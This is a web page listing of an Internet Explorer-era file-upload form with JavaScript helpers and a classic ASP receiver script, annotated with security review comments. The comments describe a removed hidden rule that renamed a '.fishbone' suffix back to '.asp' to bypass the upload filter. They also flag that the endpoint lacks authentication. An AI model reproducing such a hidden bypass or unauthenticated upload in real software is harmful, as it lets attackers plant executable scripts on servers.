html页面代码
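<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<!--
  Upload form. The inline handlers call the global functions showpath() and
  upload() from the script below, and a $() helper that this listing does not
  define (presumably an id-lookup helper loaded elsewhere; confirm).
  The ids a, b, spath and nowurl are looked up by that script.
-->
<label for="a">上传文件</label> <input type="file" id="a"><br>
<label for="b">存放路径</label> <input type="text" id="b" onclick="showpath()"> 需写上文件名<br>
<input type="button" onclick='upload($("a").value,$("b").value)' value="上传"><br>
<span id="spath"></span><br>
<span id="nowurl"></span>
<style>
.tfont { font-size: 12px }
</style>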
< SCRIPT LANGUAGE ="JavaScript" >
<!--
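/**
 * Requests the path listing from the upload endpoint and shows it in the
 * #spath element under the path field.
 */
function showpath() {
  var request = new Ajax();
  var onDone = function (o) {
    // Ajax passes the request object on HTTP 200 but a bare status number
    // otherwise; without this guard a failure would print "undefined".
    if (!o || typeof o.responseText != "string") {
      return;
    }
    // NOTE(review): the response is inserted as markup, so this page trusts
    // whatever the endpoint returns. The request goes over plain http, so the
    // body is not integrity-protected in transit; serve the endpoint over
    // https and keep the listing free of user-controlled text.
    $("spath").innerHTML = o.responseText;
  };
  var onProgress = function () {};
  request.open("http://10.84.50.220/WebService1/uploadfile.asp", "post", onDone, onProgress);
}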
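/**
 * Mouse-over handler: shows a clickable cursor and highlights the element
 * under the pointer.
 *
 * No caller is visible in this listing; presumably the markup returned to
 * showpath() wires it up (confirm).
 *
 * @param {Event} [e] event object; falls back to IE's global window.event,
 *                    which is what the original code relied on.
 */
function overit(e) {
  e = e || window.event;
  var item = e.target || e.srcElement;
  // "hand" is an IE-only cursor keyword; "pointer" is the standard value.
  item.style.cursor = "pointer";
  item.style.background = "#EECC99";
}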
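/**
 * Mouse-out handler: clears the highlight that overit() applied.
 *
 * @param {Event} [e] event object; falls back to IE's global window.event.
 */
function outit(e) {
  e = e || window.event;
  var item = e.target || e.srcElement;
  item.style.background = "transparent";
}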
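/**
 * Click handler for an entry of the path listing: hides the listing
 * (the clicked element's parent), focuses the path field #b and copies the
 * clicked entry into it.
 *
 * @param {Event} [e] event object; falls back to IE's global window.event.
 */
function s(e) {
  e = e || window.event;
  var item = e.target || e.srcElement;
  item.parentNode.style.display = "none";
  var field = $("b");
  field.focus();
  // The entry's markup is copied as-is; entries are expected to be plain text.
  field.value = item.innerHTML;
}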
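/**
 * Reads the file at `surl`, wraps its bytes and the target name `turl` in an
 * XML document (<root><file1 dt="bin.base64"/><name/></root>) and POSTs that
 * document to the upload endpoint. Progress and the final link are shown in
 * the #nowurl element.
 *
 * Relies on ActiveXObject (MSXML2.DOMDocument), so it only runs in Internet
 * Explorer.
 *
 * @param {string} surl path of the local file, as given by the file input
 * @param {string} turl target path and file name, typed by the user; it is
 *                      sent to the server unchanged, so the server must
 *                      validate it
 */
function upload(surl, turl) {
  // NOTE(review): the regular expression was lost in the page's rendering
  // ("/ / / g"); turning Windows backslashes into "//" is assumed. Confirm.
  surl = surl.replace(/\\/g, "//");

  // Called without `new`: with `new`, a failed factory would yield an empty
  // object instead of false and the failure would go unnoticed.
  var read = xmlhttp();
  var read2 = xmlhttp();
  if (!read || !read2) {
    return;
  }

  var xml_dom = new ActiveXObject("MSXML2.DOMDocument");
  xml_dom.loadXML('<?xml version="1.0" ?> <root/>');
  xml_dom.documentElement.setAttribute("xmlns:dt", "urn:schemas-microsoft-com:datatypes");
  var l_node1 = xml_dom.createElement("file1");
  var fname = xml_dom.createElement("name");
  l_node1.dataType = "bin.base64";

  // Replaces the content of #nowurl with a single DOM node.
  function showStatus(node) {
    var box = $("nowurl");
    while (box.firstChild) {
      box.removeChild(box.firstChild);
    }
    box.appendChild(node);
  }

  // Second step: runs once the local file has been read.
  function p() {
    if (read.readyState != 4) {
      return;
    }
    fname.nodeTypedValue = turl;
    l_node1.nodeTypedValue = read.responseBody;
    xml_dom.documentElement.appendChild(l_node1);
    xml_dom.documentElement.appendChild(fname);

    read2.open("POST", "http://10.84.50.220/WebService1/uploadfile.asp", true);
    try {
      read2.setRequestHeader("Content-Type", "text/xml");
    } catch (e) {
      try { read2.overrideMimeType("text/xml"); } catch (e2) {}
    }

    read2.onreadystatechange = function () {
      if (read2.readyState != 4) {
        showStatus(document.createTextNode("上传中……" + read2.readyState));
        return;
      }
      if (read2.status == 200) {
        // Built with DOM calls rather than string-concatenated innerHTML:
        // `turl` is user input and must not be parsed as markup.
        var link = document.createElement("a");
        link.setAttribute("href", "http://www.cnjpzs.com/fishbone/" + turl);
        link.appendChild(document.createTextNode("now url"));
        showStatus(link);
      } else {
        // The original kept showing the progress text after a failed request.
        showStatus(document.createTextNode("上传失败:" + read2.status));
      }
    };
    read2.send(xml_dom);
  }

  read.open("get", surl, true);
  read.onreadystatechange = p;
  read.send(null);
}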
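/**
 * XMLHttpRequest factory.
 *
 * @returns {Object|boolean} a request object, or false when the browser
 *                           offers neither ActiveX XMLHTTP nor XMLHttpRequest
 */
function xmlhttp() {
  var req = false;
  // JScript conditional compilation: only Internet Explorer runs the code in
  // the comment below; every other engine sees an ordinary comment. The
  // markers must be written without inner spaces ("/*@cc_on" ... "@*/").
  /*@cc_on
  @if (@_jscript_version >= 5)
  try {
    req = new ActiveXObject("Msxml2.XMLHTTP");
  } catch (e) {
    try {
      req = new ActiveXObject("Microsoft.XMLHTTP");
    } catch (e2) {
      req = false;
    }
  }
  @end
  @*/
  // typeof yields the exact string "undefined"; a padded literal never
  // matches, and the constructor call would then throw where it is missing.
  if (!req && typeof XMLHttpRequest != "undefined") {
    req = new XMLHttpRequest();
  }
  return req;
}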
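/**
 * Ajax core: a small wrapper around XMLHttpRequest that works in Internet
 * Explorer (ActiveX) and in browsers with a native XMLHttpRequest.
 *
 * Use as `new Ajax()`; the instance exposes one method:
 *
 *   open(url, method, feedback, process, arg) -> boolean
 *     url      request URL
 *     method   "get" or "post", any letter case
 *     feedback called once when the request completes: with the request
 *              object on HTTP 200, with the numeric status otherwise
 *     process  optional; called with readyState on every other state change
 *     arg      query string for GET, request body otherwise
 *     returns  false when no request object exists or sending threw
 */
function Ajax() {
  var xhr = false, isComplete = false;
  // JScript conditional compilation: only Internet Explorer runs the code in
  // the comment below. The markers must be written without inner spaces.
  /*@cc_on
  @if (@_jscript_version >= 5)
  try {
    xhr = new ActiveXObject("Msxml2.XMLHTTP");
  } catch (e) {
    try {
      xhr = new ActiveXObject("Microsoft.XMLHTTP");
    } catch (e2) {
      xhr = false;
    }
  }
  @end
  @*/
  if (!xhr && typeof XMLHttpRequest != "undefined") {
    xhr = new XMLHttpRequest();
  }

  this.open = function (url, method, feedback, process, arg) {
    if (!xhr) return false;
    isComplete = false;
    method = method.toUpperCase();
    try {
      if (method == "GET") {
        // Without an argument the URL is used as given, not "url?undefined".
        xhr.open(method, arg == null ? url : url + "?" + arg, true);
        arg = null;
      } else {
        xhr.open(method, url, true);
        xhr.setRequestHeader("Method", "POST " + url + " HTTP/1.1");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        // "Connection" is a header browsers manage themselves; current
        // engines ignore this call.
        xhr.setRequestHeader("Connection", "close");
      }
      xhr.onreadystatechange = function () {
        if (xhr.readyState == 4 && !isComplete) {
          isComplete = true;
          if (xhr.status == 200) {
            feedback(xhr);
          } else {
            feedback(xhr.status);
          }
        } else if (typeof process == "function") {
          process(xhr.readyState);
        }
      };
      xhr.send(arg);
    } catch (z) {
      return false;
    }
    return true;
  };
  return this;
}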
// =================
// -->
</ SCRIPT >
对应的服务器上传文件:
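<%@ language=vbscript codepage=65001 %>
<%
' Receives the XML document posted by the upload page
' (<root><file1 dt="bin.base64">...</file1><name>...</name></root>),
' decodes the file bytes and stores them under this script's directory using
' the client-supplied name.
'
' NOTE(review): nothing in this script authenticates the caller; confirm that
' access to the endpoint is restricted elsewhere (IIS authentication, network
' ACL) before it is deployed.
' NOTE(review): files are written below Server.MapPath("."), i.e. next to this
' script inside the web root. Prefer a directory where script execution is
' disabled.
Dim ado_stream, xml_dom, xml_file1, xml_name, reg, str
Dim name_ok, saved

On Error Resume Next

' Safe defaults, so that a failed step below leaves the request rejected.
Set xml_file1 = Nothing
Set xml_name = Nothing
str = ""
name_ok = False
saved = False

Set xml_dom = Server.CreateObject("Microsoft.XMLDOM")
xml_dom.load(Request)
Set xml_file1 = xml_dom.selectSingleNode("root/file1")
Set xml_name = xml_dom.selectSingleNode("root/name")
If Not (xml_name Is Nothing) Then str = Trim(xml_name.nodeTypedValue & "")

str = Replace(str, "/", "\")
' Uploaded .asp files are stored as .txt so they cannot run on the server.
' The comparison is case-insensitive here; the original matched lower case only.
str = Replace(str, ".asp", ".txt", 1, -1, vbTextCompare)
' The original also renamed a private ".fishbone" suffix back to ".asp" as a
' deliberate bypass of the rule above. It has been removed: a hidden rename
' rule works for anyone who learns of it.

' The name is client input and becomes part of a file-system path, so it is
' checked against an allow-list instead of a single blocked extension: plain
' path segments only (no "..", no drive letter, no leading separator) and a
' known extension. The extension list is an example; adjust it to the file
' types the site really needs.
Set reg = New RegExp
reg.IgnoreCase = True
reg.Pattern = "^([a-z0-9_-]+\\)*[a-z0-9_-]+\.(txt|jpg|jpeg|png|gif)$"
If Not (xml_file1 Is Nothing) Then name_ok = reg.Test(str)

If name_ok And Err.Number = 0 Then
    Set ado_stream = Server.CreateObject("ADODB.Stream")
    ado_stream.Type = 1 ' 1 = adTypeBinary
    ado_stream.Open
    ado_stream.Write xml_file1.nodeTypedValue
    ' NOTE(review): the path separator was lost in the page's rendering; "\" is assumed.
    ado_stream.SaveToFile Server.MapPath(".") & "\" & str, 2 ' 2 = adSaveCreateOverWrite
    ado_stream.Close
    If Err.Number = 0 Then saved = True
End If

Set ado_stream = Nothing
Set xml_dom = Nothing

' The original printed "Upload successful!" even after an error and echoed
' Err.Description to the client. Report the real outcome through the HTTP
' status and keep error details out of the response.
If saved Then
    Response.Write "Upload successful!"
ElseIf Not name_ok Then
    Response.Status = "400 Bad Request"
    Response.Write "Upload rejected"
Else
    Response.Status = "500 Internal Server Error"
    Response.Write "Upload failed"
End If
%>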